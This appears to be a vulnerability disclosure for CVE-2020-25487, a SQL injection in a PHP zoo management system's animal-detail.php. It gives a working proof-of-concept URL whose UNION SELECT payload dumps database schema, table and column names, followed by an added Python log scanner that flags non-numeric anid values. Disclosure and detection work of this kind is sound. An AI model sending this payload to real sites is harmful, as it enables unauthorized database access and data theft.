SQL injection Vulnerability in Zoo Management System

Ko-kn3t/CVE-2020-25487

CVE-2020-25487

#SQL injection Vulnerability in Zoo Management System V 1.0

#Vendor - https://phpgurukul.com

#Product - https://phpgurukul.com/zoo-management-system-using-php-and-mysql/

#Vulnerability Type - SQL injection

#Affected Component - zms/animal-detail.php

#Attack Type - Local

#Impact Code execution - true

#Attack Vectors - Go to the client webpage and perform SQL injection at http:///details.php?anid=

#Proof :

http://localhost/zms/animal-detail.php?anid=9%27%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,(select (@a) from(select(@a:=0x00),(select (@a) from(information_schema.columns)wheretable_schema!='information_schema' and(@a)in(@a:=concat(@a,table_schema,' > ',table_name,' >',column_name,'
'))))a),NULL,NULL,NULL,NULL--%20-
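A detection check for the `anid` parameter described above, added here as an example and not part of the original repository. It scans web-server access logs for requests to `animal-detail.php` whose `anid` value is not a plain number. It assumes `anid` is a numeric record id (the proof above uses `9`) and that logs are in common/combined log format; the function name and sample lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Oct/2020:10:00:01 +0000] '
    '"GET /zms/animal-detail.php?anid=9 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Oct/2020:10:00:07 +0000] '
    '"GET /zms/animal-detail.php?anid=9%27%20UNION%20ALL%20SELECT%20NULL,NULL--%20- HTTP/1.1" 200 48211',
    '203.0.113.9 - - [01/Oct/2020:10:00:09 +0000] '
    '"GET /zms/index.php HTTP/1.1" 200 2210',
    '203.0.113.7 - - [01/Oct/2020:10:00:12 +0000] '
    '"GET /zms/animal-detail.php?anid=12&anid=12%27 HTTP/1.1" 200 5099',
]

# Client address, method and request target. The target is matched lazily up to
# the trailing ' HTTP/x.y"' so that targets logged with raw spaces still parse.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>.+?) HTTP/[\d.]+"'
)
# Assumption: a legitimate anid is a short run of decimal digits.
VALID_ANID = re.compile(r"[0-9]{1,10}")


def suspicious_anid_requests(lines, path_suffix="/animal-detail.php", param="anid"):
    """Return (client_ip, [decoded offending values]) for each flagged request."""
    hits = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line we can parse
        url = urlsplit(match.group("target"))
        if not url.path.endswith(path_suffix):
            continue
        # parse_qs URL-decodes the values and keeps every duplicate; all copies
        # are checked because which one the application reads depends on the stack.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        bad = [v for v in values if not VALID_ANID.fullmatch(v)]
        if bad:
            hits.append((match.group("ip"), bad))
    return hits


if __name__ == "__main__":
    for ip, values in suspicious_anid_requests(SAMPLE_LOG):
        print(ip, values)
```

The same allow-list (digits only) is the input validation the affected page should apply before the value reaches a query, alongside a parameterized statement.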
